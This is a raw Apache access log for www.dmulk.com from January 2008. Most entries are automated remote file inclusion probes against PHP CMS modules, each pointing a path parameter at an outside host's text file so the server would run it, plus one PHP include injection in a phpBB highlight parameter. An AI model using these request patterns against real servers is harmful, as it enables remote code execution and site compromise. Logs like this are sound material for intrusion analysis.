88.218.97.19 - - [26/Jan/2008:10:49:50 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://yourdomain.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.2; Windows NT 5.1;)" "www.dmulk.com"
74.4.20.46 - - [26/Jan/2008:10:51:36 -0800] "GET /logs/access_071225.log/index.php?body=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.4.20.46 - - [26/Jan/2008:10:51:36 -0800] "GET /logs/index.php?body=http://theowns-host.we.bs/files/cmd-scan.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:54:40 -0800] "GET /logs/access_071216.log//modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:54:41 -0800] "GET //modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:54:41 -0800] "GET /logs//modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:54:41 -0800] "GET /logs/access_071216.log//modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:54:42 -0800] "GET //modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:54:42 -0800] "GET /logs//modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:10:55:43 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:10:55:44 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:55:49 -0800] "GET /logs/access_071216.log//modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:55:50 -0800] "GET //modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.92.110.68 - - [26/Jan/2008:10:55:50 -0800] "GET /logs//modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.mta.cl/galeria2/galery.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.246.104.22 - - [26/Jan/2008:10:58:18 -0800] "GET /logs/access_071225.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sisters.or.kr/system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.246.104.22 - - [26/Jan/2008:10:58:18 -0800] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sisters.or.kr/system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
64.246.104.22 - - [26/Jan/2008:10:58:18 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.sisters.or.kr/system/helpers/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:10:59:42 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.29.37 - - [26/Jan/2008:11:00:32 -0800] "GET /presto/?M=A HTTP/1.0" 200 510 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
70.169.155.140 - - [26/Jan/2008:11:00:45 -0800] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [26/Jan/2008:11:03:34 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:11:03:35 -0800] "GET /logs/access_071229.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:11:03:36 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:11:05:31 -0800] "GET /logs/access_071229.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:11:05:31 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:11:05:31 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://AstroIndo.Org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.8.71 - - [26/Jan/2008:11:06:08 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.71 - - [26/Jan/2008:11:06:09 -0800] "GET /logs/access_071229.log HTTP/1.0" 200 314379 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:08:55 -0800] "GET /logs/access_080101.log/index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:08:57 -0800] "GET /index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:08:58 -0800] "GET /logs/index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.169.155.140 - - [26/Jan/2008:11:12:37 -0800] "GET /logs/access_071228.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.169.155.140 - - [26/Jan/2008:11:12:37 -0800] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:11:13:26 -0800] "GET /logs/access_071214.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:11:13:27 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:11:13:28 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:11:14:49 -0800] "GET /logs/access_071230.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:14:50 -0800] "GET /logs/access_080106.log/index.php?redir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.169.155.140 - - [26/Jan/2008:11:14:59 -0800] "GET /logs/access_071225.log/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.gumgangfarm.com/shop/data/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
63.246.154.78 - - [26/Jan/2008:11:15:08 -0800] "GET /index3.php?id=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
63.246.154.78 - - [26/Jan/2008:11:15:08 -0800] "GET /logs/index3.php?id=http://www.shaunabanks.com/ct/includes/gif2png/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.dmulk.com"
66.212.28.43 - - [26/Jan/2008:11:16:11 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
66.212.28.43 - - [26/Jan/2008:11:16:11 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.shaunabanks.com/ct/includes/gif2png/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:11:17:17 -0800] "GET /logs/access_080101.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.25.73 - - [26/Jan/2008:11:19:14 -0800] "GET /plans/ HTTP/1.0" 200 958 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:11:20:20 -0800] "GET /logs/access_071214.log/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:11:20:22 -0800] "GET /plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.17.114.133 - - [26/Jan/2008:11:20:23 -0800] "GET /logs/plugins/spamx/MassDelete.Admin.class.php//geeklog//plugins/spamx/BaseAdmin.class.php?_CONF[path]=http://72.1.78.162/echow.txt?????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.22.203 - - [26/Jan/2008:11:20:45 -0800] "GET /mobileoffice/?S=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:21:18 -0800] "GET /logs/access_080106.log//?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:21:25 -0800] "GET /logs//?mosConfig_absolute_path=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 200 31831 "-" "libwww-perl/5.808" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:11:22:45 -0800] "GET /logs/access_071130.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:11:22:45 -0800] "GET //modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:11:22:46 -0800] "GET /logs//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:11:22:57 -0800] "GET /logs/access_071118.log//modules/wiwimod/spaw/spaw_control.class.php?spaw_root=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
81.176.228.30 - - [26/Jan/2008:11:24:45 -0800] "GET /logs/access_071229.log//modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://emodrago.altervista.org/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
74.6.8.120 - - [26/Jan/2008:11:25:59 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.8.120 - - [26/Jan/2008:11:25:59 -0800] "GET /?S=A HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.225.199.128 - - [26/Jan/2008:11:26:53 -0800] "GET /logs/access_071229.log/login.php?dir=http://www.gassner-design.de/phpMyEdit/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [26/Jan/2008:11:26:54 -0800] "GET /login.php?dir=http://www.gassner-design.de/phpMyEdit/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [26/Jan/2008:11:26:54 -0800] "GET /logs/login.php?dir=http://www.gassner-design.de/phpMyEdit/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
195.225.199.128 - - [26/Jan/2008:11:26:54 -0800] "GET /logs/access_071224.log/login.php?dir=http://www.gassner-design.de/phpMyEdit/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
74.6.23.116 - - [26/Jan/2008:11:27:23 -0800] "GET /logs/access_070826.log HTTP/1.0" 200 50531 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
61.220.191.9 - - [26/Jan/2008:11:29:19 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.146 - - [26/Jan/2008:11:30:28 -0800] "GET /tmp/sess_5216bb6b89ed803d92d38eefc7c30ced HTTP/1.0" 403 163 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:11:31:01 -0800] "GET /logs/index.php?side=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
195.56.111.194 - - [26/Jan/2008:11:31:01 -0800] "GET /index.php?side=http://www.top-pharma.info/rize2/kepek_rize2/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
66.151.162.98 - - [26/Jan/2008:11:34:41 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.151.162.98 - - [26/Jan/2008:11:34:41 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.mfllive.com/downloads/file_info/descriptions/.cache/figo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.22.23 - - [26/Jan/2008:11:38:03 -0800] "GET /logs/access_070811.log HTTP/1.0" 200 94297 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.193.224.190 - - [26/Jan/2008:11:39:31 -0800] "GET /modules/Neos_Chronos/header.php?base_folder=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
203.130.202.246 - - [26/Jan/2008:11:40:36 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.codinus.com/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
74.6.24.212 - - [26/Jan/2008:11:40:56 -0800] "GET /?N=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:11:41:05 -0800] "GET /logs/access_071229.log//components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:11:41:05 -0800] "GET //components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
205.234.228.74 - - [26/Jan/2008:11:41:05 -0800] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
62.193.224.190 - - [26/Jan/2008:11:41:44 -0800] "GET /logs/access_080107.log/modules/Neos_Chronos/header.php?base_folder=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [26/Jan/2008:11:41:45 -0800] "GET /logs/access_071215.log/modules/Neos_Chronos/header.php?base_folder=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [26/Jan/2008:11:42:09 -0800] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [26/Jan/2008:11:43:39 -0800] "GET /logs/access.log/modules/Neos_Chronos/header.php?base_folder=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
62.193.224.190 - - [26/Jan/2008:11:43:47 -0800] "GET /logs/access_071220.log/modules/Neos_Chronos/header.php?base_folder=http://www.cherepitsa.ru/administrator/components/com_remository/images/check.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
216.15.75.216 - - [26/Jan/2008:11:44:14 -0800] "GET /bikes/dteel/Mining_Pick.jpg HTTP/1.1" 200 23376 "http://www.st-owners.com/forums/showthread.php?t=34420&goto=nextoldest" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:11:47:26 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:11:47:27 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:11:47:27 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.216.91.36 - - [26/Jan/2008:11:50:40 -0800] "GET //modules/TotalCalendar/about.php?inc_dir=http://astroindo.org/box/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
70.86.234.234 - - [26/Jan/2008:11:53:57 -0800] "GET //?mosConfig_absolute_path=http://ljmirco.com.ar/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.139.97 - - [26/Jan/2008:11:54:54 -0800] "GET /logs/access_080106.log//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.139.97 - - [26/Jan/2008:11:55:11 -0800] "GET //index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.25.139.97 - - [26/Jan/2008:11:55:28 -0800] "GET /logs//index.php?name=PNphpBB2&file=viewtopic&t=234//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://party4you.ch/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.111.176.90 - - [26/Jan/2008:11:56:06 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://zal.sioru.net/blackguard/error?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
71.134.142.134 - - [26/Jan/2008:11:57:02 -0800] "GET /logs/access_070718.log HTTP/1.1" 200 45557 "-" "hu caq tchqiudntpss1" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:57:34 -0800] "GET /logs/access_071228.log//skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:57:35 -0800] "GET //skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:11:57:37 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
74.6.22.126 - - [26/Jan/2008:12:00:10 -0800] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
74.6.22.126 - - [26/Jan/2008:12:00:11 -0800] "GET /mobileoffice/?N=D HTTP/1.0" 200 5008 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:12:00:44 -0800] "GET /logs/access_080101.log/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:12:00:45 -0800] "GET /sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
195.242.3.251 - - [26/Jan/2008:12:00:45 -0800] "GET /logs/sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://www.gumgangfarm.com/shop/data/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:01:42 -0800] "GET /logs/access.log/admin/editor2/spaw_control.class.php?spaw_root=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:01:42 -0800] "GET /admin/editor2/spaw_control.class.php?spaw_root=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:01:43 -0800] "GET /logs/admin/editor2/spaw_control.class.php?spaw_root=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
66.80.93.168 - - [26/Jan/2008:12:04:08 -0800] "GET /logs/access_071216.log/admin/editor2/spaw_control.class.php?spaw_root=http://autodelen.net//downloads/documenten/documenten.png? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:05:45 -0800] "GET /logs/access_071230.log//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:05:55 -0800] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:05:57 -0800] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:12:06:23 -0800] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:12:06:24 -0800] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
221.141.3.102 - - [26/Jan/2008:12:06:24 -0800] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
200.73.13.24 - - [26/Jan/2008:12:06:44 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.freewebtown.com/vibeblog/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
195.70.35.179 - - [26/Jan/2008:12:07:17 -0800] "GET /presto/ HTTP/1.1" 200 526 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.6) Gecko/20061201 Firefox/2.0.0.6 (Ubuntu-feisty)" "www.dmulk.com"
